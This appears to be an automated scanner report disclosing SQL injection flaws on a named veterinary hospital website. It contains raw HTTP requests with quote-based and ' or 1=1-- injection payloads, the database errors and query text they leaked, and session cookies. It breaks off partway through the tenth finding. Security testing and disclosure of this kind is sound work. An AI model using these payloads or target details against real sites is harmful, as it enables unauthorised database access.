XSS, SQL Injection, CWE-79, CWE-89, CAPEC-86, CAPEC-66, www.vcahospitals.com

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://www.vcahospitals.com/hanson [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /hanson' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.13.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2242
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='hanson''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''hanson''
                        limit 1' at line 31

Request 2

GET /hanson'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.13.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:08 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 9793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...

1.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /hanson'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2242
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='hanson''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''hanson''
                        limit 1' at line 31

Request 2

GET /hanson''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...

1.3. http://www.vcahospitals.com/main/directory.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/directory.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main'/directory.html?utm_content=link.corp.ffe.locator. HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.5.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:45:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='main''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''
                        limit 1' at line 31

1.4. http://www.vcahospitals.com/main/img/blockquote-left.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/img/blockquote-left.png

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main'/img/blockquote-left.png HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:11:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='main''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''
                        limit 1' at line 31

1.5. http://www.vcahospitals.com/main/img/blockquote-right.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/img/blockquote-right.png

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main'/img/blockquote-right.png HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:11:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='main''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''
                        limit 1' at line 31

1.6. http://www.vcahospitals.com/main/img/sema-landing.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/img/sema-landing.jpg

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main'/img/sema-landing.jpg HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:11:54 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='main''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''
                        limit 1' at line 31

1.7. http://www.vcahospitals.com/main/offer [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 48012625'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main48012625'%20or%201%3d1--%20/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:19:19 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ahpca9ejckksr3056ippblins3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2261
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...
ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='main48012625'%20or%201%3d1--%20'
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20'
                        limit 1' at line 31

1.8. http://www.vcahospitals.com/main/offer [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /main'/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:05:10 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hq8rnqfmmvda2haj49mg0si302; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='main''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''
                        limit 1' at line 31

Request 2

GET /main''/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:05:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ohksbkggjsps1t5j8gv02nt5p1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 16281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...

1.9. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /main'/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='main''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''
                        limit 1' at line 31

Request 2

GET /main''/offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:17:35 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 16306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...

1.10. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

